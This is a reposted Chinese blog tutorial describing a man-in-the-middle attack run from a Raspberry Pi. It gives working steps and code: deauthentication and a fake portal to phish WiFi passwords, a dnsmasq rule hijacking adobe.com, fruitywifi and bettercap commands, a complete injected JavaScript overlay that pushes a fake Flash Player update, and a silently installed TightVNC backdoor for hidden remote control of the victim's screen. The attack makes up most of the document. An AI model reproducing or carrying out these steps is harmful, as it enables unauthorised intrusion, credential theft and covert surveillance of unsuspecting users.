[转载]树莓派随身工具箱:中间人劫持获取控制权

导读

上文讲解了树莓派随身工具箱的环境搭建,这段时间又对其进行了一些优化,主要是从便携美观上面改进。同时,在实际使用中发现了一些问题,并做了小小的改动。

传统的中间人攻击要用到arpspoof等敏感操作,大多数情况下会被杀毒软件拦截,同时被攻击端会出现乱码,网速卡顿甚至掉线等现象。而利用树莓派搭建物理中间人则可以有效避免以上现象。树莓派一个网卡用来接入互联网,另一个网卡作为热点,进行客户端劫持,使目标流量都经过自身。

前期准备

1.)整体思路

本次渗透测试采用诱导安装的方法,通过中间人劫持的方式在网页注入js,弹出蒙版层,诱导用户下载捆绑后门的FlashPlayer更新程序。

劫持方法比较多,粗略的列举一下:

1,万能钥匙类软件可以解开:

I、获取目标路由器操作权,修改WiFi配置,树莓派伪造路由器之前的热点。

II、目标路由器支持中继的话,直接修改,将其作为中继使用,上游设备为树莓派。

2、万能钥匙类软件无法连接:

I、发送deauth攻击,阻断客户端与目标路由器的连接,同时树莓派伪造热点,通过配置树莓派dnsmasq.config  启用no-pool,开启webserver并配置404页面,实现客户端接入后自动弹出页面,诱导用户输入WIFI密码。

II、树莓派抓取握手包,丢在淘宝十五大洋搞定。

III、社工方式接触路由器,快速的按一下wps按键。

2.)生成后门程序

最好的后门就是那些常见的软件,永远不会被杀毒软件干掉。比如ftpserver、Sunlogin oray、VNCserver等。这里选择tight-vnc-server,小巧便捷;后门生成需要借助7-Zip SFX Maker、Resource Hacker、Regsnap等工具的帮助。首先在本地安装完毕,然后对比注册表和文件变化,最后提取出来,精简核对后与FlashPlayer一起打包,实现后台静默安装。然后就是拿到各个环境里面测试,再针对性的进行修改。

测试完毕后将后门程序放在Apache根目录,同时在下文的js里面指定具体位置。

3.)配置dnsmasq劫持adobe.com指向本地

修改  /etc/dnsmasq.conf 增加

address=/adobe.com/10.0.0.1

然后 service dnsmasq restart重启dnsmasq使配置生效。接着service apache2 start 启动Apache

4.)安装并配置软件

[email protected]:~# apt-get install fruitywifi-module-fruityproxy
[email protected]:~# service fruitywifi start

访问:http://你的树莓派地址:8000 用户名和密码都为admin

config设置如下图:

IN是提供AP接入点的网卡 OUT是连接上外网的网卡,可根据实际情况配置

5.)实施渗透

各项准备完毕,目标设备流量已全部经过树莓派。

首先运行bettercap对所有流经树莓派的流量进行嗅探,粗略的了解下对方网络流量情况(一些常用的命令可以事先写成脚本,方便使用)

bettercap -I wlan1 -O log.txt -X -L -S NONE

通过网络流量以及nmap扫描可以很快的确定对方主机的IP地址。然后在主机发生网络访问的时候开启fruitywifi Inject模块。

在 status→fruityprox edit→Inject里面写入要注入的js脚本,实现诱导下载。

<script>(function(a){window.isMobile=false;if(/(android|ipad|playbook|silk|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){window.isMobile=true}else{setTimeout("showDiv();",2000)}})(navigator.userAgent||navigator.vendor||window.opera);document.writeln("<div><style type=\‘text/css\‘>body{overflow:hidden;height:100%}.popWindow{background-color:#9D9D9D;width:100%;height:100%;left:0;top:0;filter:alpha(opacity=50);opacity:0.5;z-index:8900;position:absolute}.maskLayer{background-color:#636365;box-shadow:0 0 15px#393838;padding:10px;width:220px;line-height:30px;left:50%;top:50%;margin-left:-100px;margin-top:-100px;color:#ea8726;z-index:9000;position:absolute;text-align:center}</style><div id=\‘popWindow\‘class=\‘popWindow\‘style=\‘display: none;\‘></div><div id=\‘maskLayer\‘class=\‘maskLayer\‘style=\‘display: none;\‘><p>页面检测到您的Flash Player版本太低,请下载并安装更新!</br><a target=\‘_blank\‘href=\‘http://get.adobe.com/flashplayer/flashplayer29_va_install.exe\‘onclick=\‘closeDiv()\‘style=\‘cursor:pointer;text-decoration: none;\‘><input value=\‘下载更新\‘type=\‘button\‘></a></p></div></div>");function showDiv(){document.getElementById(‘popWindow‘).style.display=‘block‘;document.getElementById(‘maskLayer‘).style.display=‘block‘}function closeDiv(){document.getElementById(‘popWindow‘).style.display=‘none‘;document.getElementById(‘maskLayer‘).style.display=‘none‘;document.body.style.overflow="visible"}</script>

注入的script不能有换行,所以需要提前把代码压缩一下。本机测试样式如下:

注入完毕后脚本会自动检测当前浏览器是移动端还是pc端,如果是PC端就延迟三秒,然后弹出蒙版同时诱导下载,用户点击后,关闭蒙版,恢复对页面的操作(亦或者一直阻止对页面的操作)。手机端就什么也不做。并且由于事先在树莓派上配置好了dnsmasq 使默认dnsserver以及dhcpserver都指向树莓派,加上adobe域名的劫持,客户端看不出太大的端倪(下载地址是http而不是adobe默认的https,不过这已经足够骗过很多人了。)

6).检查执行情况

每隔一段时间就对目标IP进行一次nmap扫描,当发现5900端口开放的时候,就可以确认渗透完成,此时关闭Inject模块。

附图·-安装过程:

后门程序和tvnserver同步安装,纵使发生意外情况,tvnserver安装失败,在flashplayer安装程序进程结束后还会进行安装情况检查,并尝试第二次安装(不安装为系统服务,使用用户模式)。

7.)enjoy

使用vncviewer进行连接,目标主机全程无提示,无小图标。还可以在不影响目标主机的情况下观察对方屏幕。

嗯,不要怀疑。我在医院数据中心工作。负责维护系统的安全。

谨此,献给各位。

原文地址:https://www.cnblogs.com/h2zZhou/p/8963318.html

时间: 2024-10-07 12:33:44

[转载]树莓派随身工具箱:中间人劫持获取控制权的相关文章

[转载]如何使Android应用程序获取系统权限来修改系统时间

在 android 的API中有提供 SystemClock.setCurrentTimeMillis()函数来修改系统时间,可惜无论你怎么调用这个函数都是没用的,无论模拟器还是真机,在logcat中总会得到"Unable to open alarm driver: Permission denied ".这个函数需要root权限或者运行与系统进程中才可以用. 本来以为就没有办法在应用程序这一层改系统时间了,后来在网上搜了好久,知道这个目的还是可以达到的. 第一个方法简单点,不过需要在

[转载]淘宝API调用 申请 获取session key

http://www.cnblogs.com/zknu/archive/2013/06/14/3135527.html 在调用淘宝的API时,我们都会用到appkey,appsecret,appsession. 1.我们申请应用就会有appkey和appsecret了 2.正式环境下获取SessionKey 注意:web插件平台应用和web其它应用在正式环境下是同样的获取方法 1).WEB应用 回调URL:http://cnblogs.com 访问http://container.open.ta

APP帐号登陆风险:中间人劫持(MITM)攻击

AppBugs公司研究人员经过分析发现,市面上有14款总计下载量高达8千万次的主流APP在处理社交账号登陆时存在安全风险,极易遭到中间人劫持(MITM)攻击. 安全风险应用清单 MeituPic美图秀秀:暴露用户的Facebook.百度.人人账号的密码,它的下载量约为1千万至5千万. Astro File Manager with Cloud 文件管理器:暴露微软账号的密码.根据Google Play上的资料,Astro管理器的下载量约为5千万至1亿. gReader新闻客户端:暴露用户的Fac

苹果iCloud遭SSL中间人劫持,用户如何防范隐私泄露?

近日,苹果iCloud服务器在中国被人使用SSL中间人劫持,部分地区用户隐私恐将不保.据了解,苹果iCloud网站有多个IP地址,若用户访问苹果iCloud时被随机分配到23.59.94.46这一IP地址,又忽视了网页安全警告,输入到iCloud的用户名和密码都会被制造自签证书的中间人拿到,存储在iCloud的私房照片.钥匙圈里的各种帐号.密码都会被别人偷走,前不久,好莱坞"***门"就是黑客入侵明星们的iCloud账户引起的. 在此,沃通CA提醒用户,在使用云服务时牢记以下几点,防范

Openssl FREAK 中间人劫持漏洞 - 解决方案

openssl升级步骤: 环境CentOS 1 wget http://www.openssl.org/source/openssl-1.0.2a.tar.gz 2 tar zxvf openssl-1.0.2a.tar.gz 3 cd openssl-1.0.2a 4 ./config --prefix=/usr/local/ssl 5 make && make install 6 mv /usr/bin/openssl /usr/bin/openssl.OFF 7 mv /usr/in

[转载]Dll注入技术之劫持进程创建注入

转自:黑客反病毒 DLL注入技术之劫持进程创建注入 劫持进程创建注入原理是利用Windows系统中CreateProcess()这个API创建一个进程,并将第6个参数设为CREATE_SUSPENDED,进而创建一个挂起状态的进程,利用这个进程状态进行远程线程注入DLL,然后用ResumeThread()函数恢复进程.1.创建挂起的进程     下面是创建一个挂起的计算器程序进程的主要代码: STARTUPINFO si = {0}; si.cb = sizeof si; si.dwFlags

[转载] 树莓派读取温湿度传感器DHT11

原文地址: http://blog.csdn.net/liang890319/article/details/8739683 硬件: 树莓派 2.0 DHT模块  接树莓派5V GND GPIO1 功能:读取传感器数据并打印出来 // //mydht11.c // #include <wiringPi.h> #include <stdio.h> #include <stdlib.h> typedef unsigned char uint8; typedef unsign

转载 Easyui Tree方法扩展 - getLevel(获取节点级别)

Easyui Tree一直就没有提供这个方法,以前没有用到,所 以一直没怎么在意,这次自己用到了,顺便扩展了一个方法,分享给大家. $.extend($.fn.tree.methods, { getLevel:function(jq,target){ var l = $(target).parentsUntil("ul.tree","ul"); return l.length+1; } }); 用法: var node = $().tree("getSel

【漏洞复现】局域网 ARP 中间人攻击 获取他人账号密码

日期:2019-07-18 14:24:42 更新: 作者:Bay0net 介绍:如何在局域网内,窃取其他用户的账号密码? 0x01. 漏洞环境 攻击工具 arpspoof 基本用法: arpspoof -i eth0 -t [目标 IP] [网关] arpspoof -i eth0 -t [网关][目标 IP] 攻击机 IP:192.168.43.67 操作系统:Kali 2019 靶机 IP:192.168.43.135 操作系统:Win7 旗舰版 SP1 攻击机和靶机,在同一个局域网内,局